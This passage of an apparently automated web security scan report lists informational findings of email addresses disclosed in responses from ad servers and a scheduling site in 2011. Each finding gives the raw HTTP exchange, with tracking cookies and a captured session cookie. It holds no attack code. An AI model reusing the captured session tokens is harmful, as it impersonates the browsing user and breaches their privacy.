Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b2@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:02 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0";Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:02 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
13.4. http://ads.adbrite.com/adserver/vdi/684339  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; vsd=0@4@4da052a6@www.wcax.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@5@4da052be@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:14 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0";Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:14 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
13.5. http://ads.adbrite.com/adserver/vdi/712156  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/712156?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:22:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Sun, 10-Apr-2011 00:22:01 GMT
Set-Cookie: vsd=0@1@4d9fa6a9@s7.addthis.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 00:22:01 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 00:22:01 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
13.6. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/742697?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:41:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 12-Apr-2011 16:41:21 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D";Path=/;Domain=.adbrite.com;Expires=Thu, 08-Apr-2021 16:41:21 GMT
Set-Cookie: vsd=0@1@4da32f31@cdn.turn.com;Path=/;Domain=.adbrite.com;Expires=Wed, 13-Apr-2011 16:41:21 GMT
Set-Cookie: fq=;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 16:41:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
13.7. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@3@4da052a5@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@4@4da052a6@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:50 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:50 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
13.8. http://ads.adbrite.com/adserver/vdi/779045  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/779045?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b0@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:00 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:779045:20861280:37820808542507095:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:00 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
13.9. http://ads.foxnews.com/js/omtr_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.foxnews.com
Path:   /js/omtr_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/omtr_code.js HTTP/1.1
Host: ads.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 1d
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/javascript
Last-Modified: Wed, 05 Jan 2011 23:22:43 GMT
ETag: "504b9e-c133-49921a97796c0"
Vary: Accept-Encoding
Cache-Control: max-age=43635
Date: Mon, 11 Apr 2011 16:21:06 GMT
Connection: close
Content-Length: 49459

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
D
...[SNIP]...
7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=
...[SNIP]...
13.10. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following email address was disclosed in the response:

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=361&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@2@4da052a4@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj%2C86fx4%2C1uo0%7Cljdxno"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: vsd=0@3@4da052a5@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:49 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:49 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:49 GMT
Content-Length: 1765

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25460691&ahcid
...[SNIP]...
13.11. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following email address was disclosed in the response:

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=360&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4d9fa6a8@s7.addthis.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B";Path=/;Domain=.adbrite.com;Expires=Sat, 16-Apr-2011 12:35:43 GMT
Set-Cookie: b="%3A%3Adqjd";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 06-Apr-2021 12:35:43 GMT
Set-Cookie: vsd=0@1@4da0529f@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:43 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 1583

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid
...[SNIP]...
13.12. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following email address was disclosed in the response:

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=331&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: vsd=0@2@4da052b7@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:07 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj%2C86fx4%2C1uo0%7Cljdxo7";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:36:07 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:07 GMT
Content-Length: 2010

var ADBRITE_setIFrameContent;

if (!ADBRITE_setIFrameContent) {
   ADBRITE_setIFrameContent = [];
}

function AdBriteRender_03b6db6a_de03_4491_aa16_5d05d04c0b29() {
   var frame = frames.AdBriteFrame_03b6
...[SNIP]...
13.13. http://appointron.com/javascripts/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://appointron.com
Path:   /javascripts/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/controls.js HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/users/new?plan_type_id=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _base_session=BAh7BzoMY3NyZl9pZCIlMzYyZDE5YmY5YjlmYThlZTFkNjQ1MjM0NzE0OTljYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--1145f79e31b865380099261ac424a3b2abb8835b; __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.6.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:50:03 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Thu, 07 Apr 2011 07:05:43 GMT
Cache-Control: public, max-age=43200
X-Varnish: 1427854031
Age: 0
Via: 1.1 varnish
Content-Length: 34797

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (http://blogs.law.harvard.edu/ivan)
// (c) 2005-2007 Jon Tirsen (
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...
13.14. http://appointron.com/javascripts/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://appointron.com
Path:   /javascripts/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/dragdrop.js HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/users/new?plan_type_id=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _base_session=BAh7BzoMY3NyZl9pZCIlMzYyZDE5YmY5YjlmYThlZTFkNjQ1MjM0NzE0OTljYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--1145f79e31b865380099261ac424a3b2abb8835b; __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.6.10.1302288506

Response

